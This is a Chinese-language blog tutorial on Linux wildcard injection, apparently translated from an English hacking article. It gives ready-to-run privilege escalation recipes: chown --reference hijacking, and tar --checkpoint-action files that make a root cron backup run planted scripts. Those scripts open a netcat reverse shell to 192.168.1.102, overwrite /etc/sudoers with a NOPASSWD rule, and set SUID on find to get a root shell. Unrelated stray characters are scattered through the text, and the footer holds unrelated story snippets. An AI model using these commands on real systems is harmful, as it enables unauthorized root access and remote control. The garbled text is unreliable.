命令執(zhí)行之Linux Shell中的通配符注入

通配符注入(Wildcard Injection)是一有趣的老式Unix黑客技術(shù)巴粪。
個人感覺秘遏,就是用“特殊的文件名”來輔助執(zhí)行命令项棠。

通配符

字符 含義 實例
* 匹配 0 或多個字符 a*b a與b之間可以有任意長度的任意字符, 也可以一個也沒有, 如aabcb, axyzb, a012b, ab匈庭。
? 匹配任意一個字符 a?b a與b之間必須也只能有一個字符, 可以是任意字符, 如aab, abb, acb, a0b
[list] 匹配list中的任意單一字符 a[xyz]b a與b之間必須也只能有一個字符, 但只能是 x 或 y 或 z, 如: axb, ayb, azb僚害。
[^list] 匹配除list中的任意單一字符 a[^0-9]b a與b之間必須也只能有一個字符, 但不能是阿拉伯?dāng)?shù)字, 如axb, aab, a-b禽绪。
[c1-c2] 匹配c1-c2中的任意單一字符如:[0-9] [a-z] a[0-9]b 0與9之間必須也只能有一個字符闸度,如a0b, a1b... a9b猾骡。
{string1,string2,...} 匹配sring1或string2(或更多)其中一字符串 a{abc,xyz,123}b a與b之間只能是abc或xyz或123這三個字符串之一瑞躺。

[]的特殊例子

[]:匹配范圍
[^]:排除匹配范圍
[:alnum:]:所有字母和數(shù)字
[:alpha:]:所有字母
[:digit:]:所有數(shù)字
[:lower:]:所有小寫字母
[:upper:]:所有大寫字母
[:blank:]:空白字符和TAB制表符
[:space:]:包括空白字符、TAB制表符(\t)兴想、換頁(\f)
[:cntrl:]:所有控制字符
[:graph:]:可打印并可看到的字符幢哨。空格是可打印的嫂便,但是不是可看到的捞镰。
[:print:]:所有可打印字符
[:punct:]:所有標點符號,非字母毙替、數(shù)字岸售、控制字符和space字符。
[:xdigit:]:十六進制數(shù)的字符厂画。

特殊變量
IFS 分隔符凸丸,<space><tab><enter>三者之一組成(我們常用space)。
CR 由<enter>產(chǎn)生袱院。

簡單的實例1

首先建立3個文件屎慢,各自寫入了一行內(nèi)容

cd /Desktop
mkdir wild
cd wild
echo "Hello Friends" > file1
echo "This is Wildcard Injection" > file2
echo "take help" > --help

之后用cat命令查看這些文件

cat file1
cat file 2
cat --help

前兩個是不會有異常的,但是在嘗試讀取--help這個文件的時候忽洛,顯示的不是take help腻惠,而是從自己的庫中調(diào)用自己的-help選項,這種類型的技巧稱為Wildcard wildness欲虚。

通過Chown劫持文件所有者

利用chown命令可以改變文件的所有者集灌,一般用戶沒有普通權(quán)限更改別人文件的所有者,除了root复哆。

超級管理員用戶 (root) – 執(zhí)行chown命令欣喧。
非root用戶1(raj) – 執(zhí)行普通任務(wù),如創(chuàng)建文件
非root用戶2(aarti) – 執(zhí)行普通任務(wù)寂恬,如創(chuàng)建文件
惡意用戶(Ignite) – 注入chown命令
在下圖中你可以看到续誉,所有PHP文件的所有者均為raj用戶。

chown有個參數(shù)--reference初肉,作用如下酷鸦,
With --reference, change the owner and group of each FILE to those of RFILE.“克隆”參考文件的權(quán)限到你指定的文件或目錄上。

cd
ls -al
echo "" > my.php
echo > --reference=my.php

當(dāng)root用戶使用通配符*修改所有PHP文件所有權(quán)時牙咏,ignite用戶將取得所有文件間接所有權(quán)臼隔。

chown -R aarti:aarti *.php
ls -al

tar命令的利用

創(chuàng)建一些文件,然后用crontab命令定時備份

nano /etc/crontab
*/1 *   * * *   root tar -zcf /var/backups/html.tgz /var/www/html/*

crontab和tar通配符注入

假設(shè)現(xiàn)在以一個普通用戶的身份登陸終端妄壶,嘗試提權(quán)到root摔握。然后cat /etc/crontab查看計劃任務(wù)。

本機用msfvenom生成一個netcat反彈語句
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R
然后復(fù)制到ssh中丁寄,cd到要打包的目錄中

echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

可以先執(zhí)行tar cf archive.tar *看看觸發(fā)的效果氨淌,crontab中的tar是root權(quán)限運行的泊愧,所以就等著反彈root會話吧。

--checkpoint[=NUM??BER] (翻譯起來繞口) 按百分幾顯示處理進度盛正?
--checkpoint-action = ACTION 在每個檢查點上執(zhí)行指定的操作

有錯誤的第二個例子

原作者是這樣子的

cd /tmp
mkdir data
chmod 777 data
cd data
echo "" > f1
echo "" > f2
echo "" > f3

在其他目錄中編寫一個bash腳本删咱,tar打包/tmp/data

mkdir info
cd info
nano script.sh
chmod 777 script.sh

注意豪筝,這個shell的內(nèi)容是這樣的

#!/bin/bash
cd /tmp/data
tar cf /backup/backup.tgz *

手動執(zhí)行這個腳本就會發(fā)現(xiàn)痰滋,根本不會自動切換到/tmp/data目錄。

這是因為shell在執(zhí)行腳本時续崖,會創(chuàng)建一個子shell敲街,并在子shell中逐個執(zhí)行腳本中的指令。 在子shell中已經(jīng)切換了目錄了严望,但是子shell一旦執(zhí)行完多艇,馬上退出,子shell中的變量和操作全部都收回著蟹。回到終端根本就看不到這個過程的變化墩蔓。

解決辦法

執(zhí)行source c.sh,這時候就是直接在終端的shell執(zhí)行腳本了萧豆,沒有生成子shell奸披,執(zhí)行的結(jié)果就是輸出歷史命令,并且切換了目錄涮雷。
每次都要輸入source是一件煩瑣的事情阵面,其實source命令又叫點命令,所以執(zhí)行. ./c.sh是一樣的效果洪鸭,注意:.和.中間有個空格样刷!

tar+crontab+sudoers

就是用crontab改了sudoers文件的內(nèi)容

echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
echo "" > "--checkpoint-action=exec=sh demo.sh"
echo "" > --checkpoint=1
tar cf archive.tar *

tar+crontab+suid

圖略,就是用crontab改變文件的suid實現(xiàn)提權(quán)

echo "chmod u+s /usr/bin/find" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
ls -al /usr/bin/find
find f1 -exec "whoami" \;
root
find f1 -exec "/bin/sh" \;
id
whoami

在ctf中的利用

看完上面的通配符注入览爵,再看看這個置鼻,p神博客寫的無字母數(shù)字webshell之提高篇

覺得看不夠的話還可以接著看下面這兩個

【CTF 攻略】如何繞過四個字符限制getshell
https://www.anquanke.com/post/id/87203
命令注入突破長度限制
https://www.freebuf.com/articles/web/154453.html

注意,代碼不能隨便亂插蜓竹,否則就被審核了
原文:https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末箕母,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子俱济,更是在濱河造成了極大的恐慌嘶是,老刑警劉巖,帶你破解...
    沈念sama閱讀 206,378評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件蛛碌,死亡現(xiàn)場離奇詭異聂喇,居然都是意外死亡,警方通過查閱死者的電腦和手機蔚携,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,356評論 2 382
  • 文/潘曉璐 我一進店門希太,熙熙樓的掌柜王于貴愁眉苦臉地迎上來克饶,“玉大人,你說我怎么就攤上這事誊辉⊥罚” “怎么了?”我有些...
    開封第一講書人閱讀 152,702評論 0 342
  • 文/不壞的土叔 我叫張陵芥映,是天一觀的道長。 經(jīng)常有香客問我远豺,道長奈偏,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 55,259評論 1 279
  • 正文 為了忘掉前任躯护,我火速辦了婚禮惊来,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘棺滞。我一直安慰自己裁蚁,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 64,263評論 5 371
  • 文/花漫 我一把揭開白布继准。 她就那樣靜靜地躺著枉证,像睡著了一般。 火紅的嫁衣襯著肌膚如雪移必。 梳的紋絲不亂的頭發(fā)上室谚,一...
    開封第一講書人閱讀 49,036評論 1 285
  • 那天,我揣著相機與錄音崔泵,去河邊找鬼秒赤。 笑死,一個胖子當(dāng)著我的面吹牛憎瘸,可吹牛的內(nèi)容都是我干的入篮。 我是一名探鬼主播,決...
    沈念sama閱讀 38,349評論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼幌甘,長吁一口氣:“原來是場噩夢啊……” “哼潮售!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起含潘,我...
    開封第一講書人閱讀 36,979評論 0 259
  • 序言:老撾萬榮一對情侶失蹤饲做,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后遏弱,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體盆均,經(jīng)...
    沈念sama閱讀 43,469評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,938評論 2 323
  • 正文 我和宋清朗相戀三年漱逸,在試婚紗的時候發(fā)現(xiàn)自己被綠了泪姨。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片游沿。...
    茶點故事閱讀 38,059評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖肮砾,靈堂內(nèi)的尸體忽然破棺而出诀黍,到底是詐尸還是另有隱情,我是刑警寧澤仗处,帶...
    沈念sama閱讀 33,703評論 4 323
  • 正文 年R本政府宣布眯勾,位于F島的核電站,受9級特大地震影響婆誓,放射性物質(zhì)發(fā)生泄漏吃环。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 39,257評論 3 307
  • 文/蒙蒙 一洋幻、第九天 我趴在偏房一處隱蔽的房頂上張望郁轻。 院中可真熱鬧,春花似錦文留、人聲如沸好唯。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,262評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽骑篙。三九已至,卻和暖如春权旷,著一層夾襖步出監(jiān)牢的瞬間替蛉,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,485評論 1 262
  • 我被黑心中介騙來泰國打工拄氯, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留躲查,地道東北人。 一個月前我還...
    沈念sama閱讀 45,501評論 2 354
  • 正文 我出身青樓译柏,卻偏偏與公主長得像镣煮,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子鄙麦,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 42,792評論 2 345